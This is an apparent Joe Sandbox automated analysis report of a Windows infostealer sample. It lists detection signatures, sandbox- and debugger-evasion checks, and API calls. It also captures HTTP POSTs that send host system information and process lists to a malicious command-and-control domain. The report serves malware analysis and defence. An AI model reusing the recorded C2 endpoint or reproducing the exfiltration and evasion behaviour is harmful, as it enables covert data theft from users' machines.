Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Cc8zEnIDB2.exe

Overview

General Information

Sample name:Cc8zEnIDB2.exe
renamed because original name is a hash value
Original sample name:a0d6c9d4d75289ffa8f7dbda90e3fce6.exe
Analysis ID:1578071
MD5:a0d6c9d4d75289ffa8f7dbda90e3fce6
SHA1:3e3b99a9b625fbd216908a07754adab568dbef4d
SHA256:ca737deb8d7b8dc261e6dd95dd42d7316e670d886023a7e4369df4a518c972ce
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Cc8zEnIDB2.exe (PID: 7540 cmdline: "C:\Users\user\Desktop\Cc8zEnIDB2.exe" MD5: A0D6C9D4D75289FFA8F7DBDA90E3FCE6)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: Cc8zEnIDB2.exeAvira: detected
Antivirus detection for URL or domain
Source: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322http://home.twentytk20pn.top/WEIsmPfDcpBFAvira URL Cloud: Label: malware
Source: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322963Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: Cc8zEnIDB2.exeVirustotal: Detection: 52%Perma Link
Source: Cc8zEnIDB2.exeReversingLabs: Detection: 44%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: Cc8zEnIDB2.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: -----BEGIN PUBLIC KEY-----0_2_004FDCF0
Source: Cc8zEnIDB2.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: mov dword ptr [ebp+04h], 424D53FFh0_2_0053A5B0
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_0053A7F0
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_0053A7F0
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_0053A7F0
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_0053A7F0
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_0053A7F0
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_0053A7F0
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_0053B560
Source: Cc8zEnIDB2.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_004D255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_004D255D
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_004D29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_004D29FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1Host: home.twentytk20pn.topAccept: */*Content-Type: application/jsonContent-Length: 499218Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 35 39 33 36 31 33 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: global trafficHTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1Host: home.twentytk20pn.topAccept: */*Content-Type: application/jsonContent-Length: 143Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
Source: Joe Sandbox ViewIP Address: 98.85.100.80 98.85.100.80
Source: Joe Sandbox ViewIP Address: 194.87.47.113 194.87.47.113
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_0059A8C0 recvfrom,0_2_0059A8C0
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.twentytk20pn.top
Source: unknownHTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1Host: home.twentytk20pn.topAccept: */*Content-Type: application/jsonContent-Length: 499218Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 35 39 33 36 31 33 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: Cc8zEnIDB2.exe, 00000000.00000003.1302588655.000000000730F000.00000004.00001000.00020000.00000000.sdmp, Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
Source: Cc8zEnIDB2.exe, 00000000.00000003.1302588655.000000000730F000.00000004.00001000.00020000.00000000.sdmp, Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
Source: Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnY322
Source: Cc8zEnIDB2.exe, 00000000.00000002.1396667628.0000000001885000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
Source: Cc8zEnIDB2.exe, 00000000.00000003.1385943438.0000000001882000.00000004.00000020.00020000.00000000.sdmp, Cc8zEnIDB2.exe, 00000000.00000002.1396667628.0000000001885000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322963
Source: Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322http://home.twentytk20pn.top/WEIsmPfDcpBF
Source: Cc8zEnIDB2.exe, 00000000.00000003.1302588655.000000000730F000.00000004.00001000.00020000.00000000.sdmp, Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
Source: Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: Cc8zEnIDB2.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: Cc8zEnIDB2.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: Cc8zEnIDB2.exe, Cc8zEnIDB2.exe, 00000000.00000003.1302588655.000000000730F000.00000004.00001000.00020000.00000000.sdmp, Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: Cc8zEnIDB2.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: Cc8zEnIDB2.exe, 00000000.00000003.1302588655.000000000730F000.00000004.00001000.00020000.00000000.sdmp, Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ip
Source: Cc8zEnIDB2.exe, 00000000.00000003.1302588655.000000000730F000.00000004.00001000.00020000.00000000.sdmp, Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703

System Summary

barindex
PE file contains section with special chars
Source: Cc8zEnIDB2.exeStatic PE information: section name:
Source: Cc8zEnIDB2.exeStatic PE information: section name: .idata
Source: Cc8zEnIDB2.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_004E05B00_2_004E05B0
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_004E6FA00_2_004E6FA0
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_0050F1000_2_0050F100
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_0059B1800_2_0059B180
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_0085E0300_2_0085E030
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_005A00E00_2_005A00E0
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_005362100_2_00536210
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_0059C3200_2_0059C320
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_005A04200_2_005A0420
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_008244100_2_00824410
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_004DE6200_2_004DE620
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_008547800_2_00854780
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_0059C7700_2_0059C770
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_0053A7F00_2_0053A7F0
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_008367300_2_00836730
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_004E49400_2_004E4940
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_004DA9600_2_004DA960
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_0058C9000_2_0058C900
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_006A6AC00_2_006A6AC0
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_0078AAC00_2_0078AAC0
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_00664B600_2_00664B60
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_0078AB2C0_2_0078AB2C
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_00848BF00_2_00848BF0
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_004DCBB00_2_004DCBB0
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_0085CC700_2_0085CC70
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_0084CD800_2_0084CD80
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_00854D400_2_00854D40
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_00690D800_2_00690D80
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_007EAE300_2_007EAE30
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_00822F900_2_00822F90
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_004F4F700_2_004F4F70
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_0059EF900_2_0059EF90
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_00598F900_2_00598F90
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_004E10E60_2_004E10E6
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_0083D4300_2_0083D430
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_008435B00_2_008435B0
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_008617800_2_00861780
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_005898800_2_00589880
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_008299200_2_00829920
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_00853A700_2_00853A70
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_00841BD00_2_00841BD0
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_00511BE00_2_00511BE0
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_00837CC00_2_00837CC0
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_00789C800_2_00789C80
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_004E5DB00_2_004E5DB0
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_004E3ED00_2_004E3ED0
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_004F5EB00_2_004F5EB0
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_00859FE00_2_00859FE0
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: String function: 004D75A0 appears 708 times
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: String function: 006ACBC0 appears 104 times
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: String function: 005150A0 appears 101 times
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: String function: 005B44A0 appears 76 times
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: String function: 004DCAA0 appears 64 times
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: String function: 004D71E0 appears 47 times
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: String function: 00514FD0 appears 289 times
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: String function: 00687220 appears 103 times
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: String function: 004ECD40 appears 80 times
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: String function: 00515340 appears 48 times
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: String function: 00514F40 appears 343 times
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: String function: 004ECCD0 appears 54 times
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: String function: 004DC960 appears 37 times
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: String function: 004D73F0 appears 114 times
Source: Cc8zEnIDB2.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: Cc8zEnIDB2.exeStatic PE information: Section: sgmjipkl ZLIB complexity 0.994249163187446
Source: Cc8zEnIDB2.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@6/2
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_004D255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_004D255D
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_004D29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_004D29FF
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Cc8zEnIDB2.exeVirustotal: Detection: 52%
Source: Cc8zEnIDB2.exeReversingLabs: Detection: 44%
Source: Cc8zEnIDB2.exeString found in binary or memory: bK62Xml2lldr548n8NfsjxaV4K8GfDrxFr2m+JvB/wu+H/AIk+HHwt0q80HRVbwb4Y8W+OvFHxL17TodQt9FtNT1WO+8ceMvEeu/addvNWvrZ9Saws7m30q2sbG29jIPBv6QeG4j4TxWJzV5bl+R8RZ/meLqYfOvrnNlmfw4kxkstoYXEYT6nXWUYrNMBlmWzxWHq0a+BhisXOjluIo4XDnDxP9I36JeL4a4+oYbh/+2cy4tlwdLDYTEcLwy2GHfC86e
Source: Cc8zEnIDB2.exeString found in binary or memory: lgnR3f/rnGfp3z/Tiom1SzT7tvO/8A10lPv2A/yfWj63T/AKZonVf/ADDvXbRC7G9P5f40bG9P5f41TOqNx5Vrbpz/AMtP33H5f0xVd9UunzmVE/7Zfr0/n/jU/Wf6/qJqsNinbWyfd/5JmiYJOyY/HOf0pPs77vr3kl8ishtQuXx/pMj/APbXp+tVJJ3c/M/0zj+oq/rj8vu/4BvTwlW99Vbd2/q/XotkdHttx964t0/7aZx+A/z9KgebTo/+Wsk2Ou
Source: Cc8zEnIDB2.exeString found in binary or memory: 42nk/EeWSp1sTkGe5xlkMTXyfO8fh8T+bWPv/575/pS/u/85qSo/wB3/nNf76+1/vfh/wAA/wCTQTP+2fyP+NMoooA9w/YN/a1/Z8+Cn7Wvwo+JPxN+IK+G/BPhaTx4Nd1tPC3jTXFsv7X+GnjTw7pxWw8OeHNX1S8W51jVdPtA1jZXKxi4FzMY7SOaeP8ApA/4fXf8Eyf+jl//ADDX7QP/AM6mv5If2bP2Svhp8e/2Lv22fjQus+Orf46fsu2fw98Ye
